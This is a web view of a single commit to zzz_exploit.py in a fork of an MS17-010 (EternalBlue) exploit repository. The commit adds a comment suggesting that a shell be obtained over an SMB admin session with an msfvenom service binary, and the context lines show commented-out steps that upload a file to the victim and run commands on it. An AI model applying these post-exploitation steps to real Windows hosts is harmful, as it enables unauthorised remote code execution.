bozhihouc/MS17-010
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add trivial comment

Browse Source
This commit is contained in:
worawit
2017-07-25 21:22:37 +07:00
parent a725492a5a
commit 5c2bcc0364
1 changed files with 3 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
zzz_exploit.py
View File

@@ -898,6 +898,9 @@ def smb_pwn(conn, arch):
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
def smb_send_file(smbConn, localSrc, remoteDrive, remotePath): def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
with open(localSrc, 'rb') as fp: with open(localSrc, 'rb') as fp: